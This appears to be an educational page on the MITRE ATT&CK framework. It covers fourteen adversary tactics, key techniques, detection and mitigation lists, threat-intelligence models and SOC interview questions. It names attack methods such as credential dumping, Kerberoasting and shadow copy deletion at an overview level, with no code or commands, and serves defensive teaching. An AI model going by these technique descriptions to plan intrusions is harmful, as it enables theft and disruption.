🎯 MITRE ATT&CK Framework
The MITRE ATT&CK knowledge base of adversary Tactics, Techniques, and Procedures (TTPs). 14 tactics covering the full attack lifecycle — from Reconnaissance to Impact — with key techniques, detection strategies, and mitigations.
ATT&CK Lifecycle
MITRE ATT&CK Enterprise — 14 Tactics
Each tactic represents WHY an adversary acts. Techniques describe HOW. Click any tactic to jump to details.
Tactics & Techniques Deep-Dive
Reconnaissance
TA0043Adversary gathers information to plan future operations — target org, infrastructure, employees, and technology stack.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1595 | Active Scanning | Port scanning, vulnerability scanning, banner grabbing |
| T1592 | Gather Victim Host Info | OS, hardware, installed software, patches |
| T1589 | Gather Victim Identity Info | Emails, credentials, employee names from LinkedIn, breaches |
| T1593 | Search Open Websites/Domains | OSINT from social media, DNS records, WHOIS, Shodan |
| T1598 | Phishing for Information | Spear-phishing to gather intel before attack, pretexting |
🔎 Detection
- Monitor for unusual scanning activity
- Track WHOIS/DNS lookups to your infrastructure
- Alert on social engineering attempts
- Dark web monitoring for leaked credentials
🛡️ Mitigation
- Minimize public exposure of infrastructure details
- Implement strict email anti-phishing controls
- Monitor for credential leaks
- Network segmentation to limit reconnaissance value
Resource Development
TA0042Adversary creates, purchases, or compromises resources to support operations — domains, accounts, tools, and infrastructure.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1583 | Acquire Infrastructure | Purchase domains, VPS, cloud accounts for C2 |
| T1584 | Compromise Infrastructure | Hack third-party servers to use as attack infrastructure |
| T1587 | Develop Capabilities | Custom malware, exploits, digital certificates |
| T1585 | Establish Accounts | Create social media/email accounts for social engineering |
| T1588 | Obtain Capabilities | Purchase malware, exploits, tools from underground markets |
🔎 Detection
- Track newly registered domains similar to yours (typosquatting)
- Monitor for look-alike domains
- Threat intel feeds for IOCs
- Certificate transparency log monitoring
🛡️ Mitigation
- Domain monitoring and takedown services
- Threat intelligence sharing (ISACs)
- Brand protection monitoring
- Preemptive domain registration of similar names
Initial Access
TA0001Adversary gains a foothold in the target network — phishing, exploiting public-facing applications, or using valid accounts.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1566 | Phishing | Spear-phishing attachments, links, or via service (Teams, Slack) |
| T1190 | Exploit Public-Facing App | Exploit vulns in web servers, VPNs, firewalls (Log4Shell, ProxyShell) |
| T1078 | Valid Accounts | Compromised credentials from breaches, brute force, or buying on dark web |
| T1195 | Supply Chain Compromise | Compromise software updates or dependencies (SolarWinds, xz utils) |
| T1199 | Trusted Relationship | Exploit MSPs, vendors, or partners with network access |
🔎 Detection
- Email security gateways with sandbox detonation
- IDS/IPS for exploit signatures
- Impossible travel detection for valid accounts
- Monitor for unusual login patterns
🛡️ Mitigation
- Security awareness training
- Patch management for public-facing apps
- MFA on all accounts
- Network segmentation for vendors
- Zero trust architecture
Execution
TA0002Adversary runs malicious code on the target system — via scripting, command-line, or exploitation.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1059 | Command & Scripting Interpreter | PowerShell, Bash, Python, VBScript, JavaScript |
| T1203 | Exploitation for Client Execution | Browser, Office, PDF exploits |
| T1204 | User Execution | User opens malicious attachment or clicks link |
| T1047 | WMI (Windows Management) | Remote execution via WMI queries |
| T1053 | Scheduled Task/Job | Cron jobs, Windows Task Scheduler, AT commands |
🔎 Detection
- Script block logging (PowerShell)
- EDR behavioral analysis
- Application whitelisting alerts
- Process creation monitoring (Sysmon)
- Command-line auditing
🛡️ Mitigation
- Application whitelisting (AppLocker, WDAC)
- Disable macro execution in Office
- Script execution policies
- EDR with behavioral detection
- Constrained Language Mode for PowerShell
Persistence
TA0003Adversary maintains access across restarts, credential changes, and remediation — via backdoors, scheduled tasks, or registry modifications.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1547 | Boot/Logon Autostart | Registry run keys, startup folders, login scripts |
| T1136 | Create Account | New local/domain/cloud accounts for persistent access |
| T1053 | Scheduled Task/Job | Persistent execution via scheduled tasks or cron |
| T1505 | Server Software Component | Web shells (Chopper, JSP shell), SQL triggers |
| T1098 | Account Manipulation | Add credentials, modify permissions, add SSH keys |
🔎 Detection
- Monitor registry autoruns and startup items
- Track new account creation events
- File integrity monitoring on web servers
- Audit scheduled tasks and cron changes
- Monitor SSH authorized_keys changes
🛡️ Mitigation
- Privileged access management (PAM)
- Regular audit of accounts and permissions
- File integrity monitoring (FIM)
- Restrict ability to create accounts
- GPO controls for autorun locations
Privilege Escalation
TA0004Adversary gains higher-level permissions — exploiting misconfigurations, vulnerabilities, or credential theft to move from user to admin/root/SYSTEM.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1068 | Exploitation for Privilege Escalation | Kernel exploits, UAC bypass, local vulnerabilities |
| T1078 | Valid Accounts | Using compromised admin or service account credentials |
| T1548 | Abuse Elevation Control | UAC bypass, sudo abuse, setuid/setgid manipulation |
| T1134 | Access Token Manipulation | Token impersonation, stealing tokens from other processes |
| T1484 | Domain Policy Modification | GPO abuse, trust relationship manipulation |
🔎 Detection
- Monitor for privilege escalation events (Event ID 4672, 4673)
- Track UAC bypass attempts
- Alert on unexpected admin group changes
- Monitor for token manipulation behavior
- GPO change auditing
🛡️ Mitigation
- Least privilege principle
- Patch local vulnerabilities promptly
- Credential Guard on Windows
- Harden UAC settings
- PAM solutions with JIT access
Defense Evasion
TA0005Adversary avoids detection — disabling security tools, obfuscating code, masquerading as legitimate processes, or clearing logs.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1027 | Obfuscated Files/Information | Encoded payloads, packed executables, steganography |
| T1070 | Indicator Removal | Clear event logs, delete files, timestomp |
| T1036 | Masquerading | Rename malware to svchost.exe, spoof file extensions |
| T1562 | Impair Defenses | Disable AV, tamper with EDR, stop logging services |
| T1055 | Process Injection | DLL injection, process hollowing, thread hijacking |
🔎 Detection
- EDR with tamper protection
- SIEM correlation for log gaps
- Monitor for AV/EDR service stops
- Behavioral analysis (not just signature)
- Memory scanning for injected code
🛡️ Mitigation
- Tamper-proof EDR with kernel-level protection
- Centralize logs to prevent local deletion
- Code signing enforcement
- Protected Process Light (PPL) for critical services
- Attack surface reduction rules
Credential Access
TA0006Adversary steals credentials — password hashes, tokens, tickets, keys — to move laterally and escalate privileges.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1003 | OS Credential Dumping | LSASS dump (Mimikatz), SAM database, /etc/shadow, DCSync |
| T1110 | Brute Force | Password spraying, credential stuffing, dictionary attacks |
| T1558 | Steal/Forge Kerberos Tickets | Kerberoasting, Golden Ticket, Silver Ticket attacks |
| T1557 | Adversary-in-the-Middle | LLMNR/NBT-NS poisoning, ARP spoofing, HTTPS interception |
| T1552 | Unsecured Credentials | Passwords in files, registry, scripts, environment variables |
🔎 Detection
- Monitor LSASS access patterns
- Detect Kerberos anomalies (RC4 encryption, TGS for SPNs)
- Alert on password spray patterns (many accounts, few passwords)
- Network traffic analysis for AitM
- Honey tokens / honey credentials
🛡️ Mitigation
- Credential Guard / LSA protection
- Disable NTLM where possible
- Managed Service Accounts (gMSA)
- Privileged Access Workstations (PAWs)
- Regular password rotation for service accounts
Discovery
TA0007Adversary explores the environment — network mapping, system enumeration, account discovery — to understand what to target.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1087 | Account Discovery | Enumerate local/domain/cloud accounts and groups |
| T1046 | Network Service Discovery | Port scanning, service enumeration within the network |
| T1083 | File & Directory Discovery | Search for sensitive files, configs, databases |
| T1069 | Permission Groups Discovery | Enumerate admin groups, Domain Admins, cloud IAM roles |
| T1018 | Remote System Discovery | Identify other reachable hosts (net view, ping sweeps) |
🔎 Detection
- Monitor for excessive LDAP/AD queries
- Alert on network scanning from internal hosts
- Track directory listing commands (dir, ls, find)
- Detect BloodHound/SharpHound collection
- Honey files and canary tokens
🛡️ Mitigation
- Network segmentation to limit discovery
- Restrict LDAP query scope
- Tiered administration model
- Disable unnecessary network protocols
- Deploy canary tokens and honeypots
Lateral Movement
TA0008Adversary moves through the network — using stolen credentials, RDP, SMB, WMI, or exploiting trusts to reach high-value targets.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1021 | Remote Services | RDP, SSH, SMB/Windows Admin Shares, VNC, WinRM |
| T1550 | Use Alternate Auth Material | Pass-the-Hash, Pass-the-Ticket, web session cookies |
| T1570 | Lateral Tool Transfer | Copy tools to remote systems via SMB, SCP, or C2 |
| T1563 | Remote Service Session Hijacking | RDP hijacking, SSH session hijacking |
| T1210 | Exploitation of Remote Services | Exploit vulns in SMB (EternalBlue), RDP (BlueKeep) |
🔎 Detection
- Monitor for unusual RDP/SMB connections
- Detect Pass-the-Hash (NTLM Type 3, LogonType 9)
- Track lateral tool transfer (PsExec, wmic)
- Network traffic analysis for anomalous east-west traffic
- Alert on new admin logons to servers
🛡️ Mitigation
- Network segmentation and micro-segmentation
- Restrict admin protocols to PAWs only
- Disable NTLM, enforce Kerberos
- Local admin password solution (LAPS)
- Just-in-Time (JIT) privileged access
Collection
TA0009Adversary gathers data of interest — emails, files, databases, screenshots, keystrokes — before exfiltration.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1114 | Email Collection | Mailbox access, Exchange server scraping, forwarding rules |
| T1056 | Input Capture | Keylogger, credential interception, web portal capture |
| T1113 | Screen Capture | Screenshots at intervals or on-demand |
| T1005 | Data from Local System | Sensitive files, databases, configuration files |
| T1560 | Archive Collected Data | Compress and encrypt before exfiltration (zip, rar, 7z) |
🔎 Detection
- Monitor for mass file access patterns
- Detect email forwarding rule creation
- DLP tools for sensitive data movement
- Alert on unusual archive creation
- Keystroke logging detection via EDR
🛡️ Mitigation
- Data Loss Prevention (DLP) policies
- Restrict email forwarding rules
- File access monitoring and classification
- Encrypt sensitive data at rest
- Limit access to sensitive repositories
Command & Control
TA0011Adversary communicates with compromised systems to maintain control — using encrypted channels, legitimate services, or covert protocols.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1071 | Application Layer Protocol | C2 over HTTPS, DNS, email, WebSocket |
| T1573 | Encrypted Channel | TLS/SSL encrypted C2 traffic, custom encryption |
| T1105 | Ingress Tool Transfer | Download tools from C2 server or legitimate services |
| T1572 | Protocol Tunneling | DNS tunneling, ICMP tunneling, SSH tunneling |
| T1102 | Web Service | C2 via cloud services (GitHub, Google Drive, Slack, Telegram) |
🔎 Detection
- DNS query analysis for tunneling (high entropy, unusual TXT records)
- Network traffic analysis for beaconing patterns
- JA3/JA3S TLS fingerprinting
- Monitor connections to uncommon cloud services
- Detect long-duration connections and periodic callbacks
🛡️ Mitigation
- DNS filtering and monitoring
- TLS inspection / SSL decryption
- Network segmentation and egress filtering
- Block known C2 infrastructure (threat intel)
- Application-aware firewalls (NGFW)
Exfiltration
TA0010Adversary steals data from the network — transferring it via C2 channels, cloud storage, alternative protocols, or physical media.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1041 | Exfiltration Over C2 Channel | Data sent through existing C2 connection |
| T1567 | Exfiltration Over Web Service | Upload to cloud storage (Mega, Google Drive, S3) |
| T1048 | Exfiltration Over Alternative Protocol | DNS exfil, ICMP exfil, FTP, email attachments |
| T1537 | Transfer Data to Cloud Account | Copy data to attacker-controlled cloud subscription |
| T1029 | Scheduled Transfer | Exfiltrate at specific times to blend with normal traffic |
🔎 Detection
- DLP monitoring for outbound data patterns
- DNS exfiltration detection (unusually large TXT responses)
- Monitor cloud storage uploads from corporate endpoints
- Network baseline comparison for data volume anomalies
- Alert on large outbound transfers to new destinations
🛡️ Mitigation
- DLP at network edge and endpoints
- Restrict cloud storage access (CASB)
- Egress filtering and proxy inspection
- Block unapproved file sharing services
- Encrypt sensitive data (limits value if exfiltrated)
Impact
TA0040Adversary disrupts availability, destroys data, or manipulates systems — ransomware, wipers, defacement, or business process manipulation.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1486 | Data Encrypted for Impact | Ransomware — encrypt files and demand payment (LockBit, BlackCat) |
| T1485 | Data Destruction | Wiper malware (NotPetya, WhisperGate, HermeticWiper) |
| T1489 | Service Stop | Stop critical services, databases, security tools before encryption |
| T1490 | Inhibit System Recovery | Delete shadow copies, disable backup agents, corrupt boot records |
| T1491 | Defacement | Internal/external website defacement for hacktivism or distraction |
🔎 Detection
- Monitor for mass file encryption (rapid file extension changes)
- Alert on shadow copy deletion (vssadmin, wmic)
- Track backup service/agent disruption
- File integrity monitoring for critical systems
- Canary files for ransomware early detection
🛡️ Mitigation
- Immutable backups (air-gapped, cloud with object lock)
- Ransomware protection in EDR
- Network segmentation to limit blast radius
- Incident response playbook for ransomware
- Cyber insurance with tested recovery plans
Threat Intelligence (CTI)
CTI Lifecycle
Cyber Threat Intelligence follows a structured lifecycle: 1) Direction — Define intelligence requirements (what threats matter to your org). 2) Collection — Gather data from OSINT, dark web, ISACs, commercial feeds, internal telemetry. 3) Processing — Normalize, enrich, and deduplicate raw data. 4) Analysis — Produce actionable intelligence: strategic (for executives), tactical (for SOC/hunting), operational (for IR/defense). 5) Dissemination — Share via reports, SIEM integration, automated feeds. 6) Feedback — Evaluate effectiveness and refine requirements. Levels: Strategic (geopolitical, industry trends), Operational (TTPs, campaigns), Tactical (IOCs, signatures).
Diamond Model of Intrusion Analysis
Framework for analyzing and tracking cyber intrusions through four core features: Adversary — Who is attacking (threat actor, APT group). Capability — What tools/techniques they use (malware, exploits, TTPs). Infrastructure — What resources they use (C2 servers, domains, email accounts). Victim — Who is being targeted (org, person, system). Every intrusion event has these 4 vertices. Pivoting between vertices reveals new intelligence: from an IOC (infrastructure) → find related adversary → discover other campaigns → identify additional victims. Complements MITRE ATT&CK by adding adversary attribution and relationship context.
IOC Management & Enrichment
Indicators of Compromise (IOCs) are forensic artifacts — IP addresses, domains, file hashes, URLs, email addresses — that indicate a breach. Pyramid of Pain: Hash values (trivial to change) → IP addresses → domain names → network artifacts → host artifacts → tools → TTPs (hardest to change). Enrichment: Correlate IOCs with VirusTotal, Shodan, AbuseIPDB, GreyNoise, and AlienVault OTX. Key principle: Focus on TTP-based detection (top of pyramid) rather than low-level IOCs that adversaries change frequently. Automate IOC ingestion into SIEM/EDR via threat intel platform (MISP, ThreatConnect, Anomali).
STIX / TAXII Standards
STIX (Structured Threat Information Expression) — JSON-based language for describing threat intelligence: threat actors, campaigns, malware, vulnerabilities, indicators, attack patterns, and their relationships. STIX Domain Objects (SDOs) include Indicator, Malware, Attack Pattern, Threat Actor, Campaign. TAXII (Trusted Automated Exchange of Intelligence Information) — Transport protocol for sharing STIX data. Supports Collection (pull) and Channel (push) models. Enables automated sharing between organizations. Together: STIX defines WHAT to share; TAXII defines HOW to share it. Industry standard adopted by ISACs, MITRE, and most TIP platforms.
Interview Preparation
Walk me through the MITRE ATT&CK framework and how you've used it.
MITRE ATT&CK is a knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world observations. It has 14 tactics (the WHY — from Reconnaissance to Impact) and hundreds of techniques (the HOW). I've used it for:
1Detection engineering — mapping SIEM rules to specific technique IDs to measure detection coverage.
2Threat modeling — understanding which techniques adversaries targeting our industry commonly use.
3Red team exercises — structuring attack simulations around specific tactics.
4Gap analysis — overlaying our security controls against the ATT&CK matrix to identify coverage gaps. Tools like MITRE ATT&CK Navigator help visualize this mapping.
Explain the difference between Tactics, Techniques, and Procedures in ATT&CK.
Tactics are the adversary's goals — WHY they perform an action (e.g., Privilege Escalation to gain higher access). Techniques are HOW they achieve those goals (e.g., T1068 Exploitation for Privilege Escalation). Sub-techniques are more specific variations (e.g., T1059.001 PowerShell under Command & Scripting Interpreter). Procedures are the specific implementation details — exactly how a particular threat group uses a technique (e.g., APT29 uses PowerShell encoded commands for execution). This hierarchy helps defenders at different levels: tactics for strategic planning, techniques for detection rules, procedures for threat intelligence.
How would you use ATT&CK to assess your SOC's detection coverage?
Step 1: Map existing SIEM rules, EDR detections, and network monitoring to ATT&CK technique IDs using ATT&CK Navigator. Step 2: Identify gaps — techniques with no detection rules. Step 3: Prioritize using threat intel — which techniques do adversaries targeting your industry commonly use (use groups like APT28, FIN7 as reference). Step 4: Build new detections for high-priority gaps. Step 5: Validate with purple team exercises — run atomic tests for each technique and verify alerts fire. Step 6: Create a heatmap showing coverage levels (none, partial, full) per technique. Track improvement quarterly. This gives leadership a visual, data-driven view of detection maturity.
What is Kerberoasting (T1558.003) and how do you detect/prevent it?
Kerberoasting exploits Kerberos by requesting TGS tickets for Service Principal Names (SPNs) — these tickets are encrypted with the service account's NTLM hash, which can be cracked offline. Detection: Monitor for anomalous TGS requests (Event
4
7
6
9especially with RC4 encryption (versus AES), requests from unusual sources, or high volume TGS requests from a single user. Prevention: Use Managed Service Accounts (gMSA) with auto-rotating 120-char passwords. Set long, complex passwords (25+ chars) on service accounts. Enforce AES encryption for Kerberos. Minimize SPNs — remove unnecessary ones. Alert on service account usage from non-service hosts.
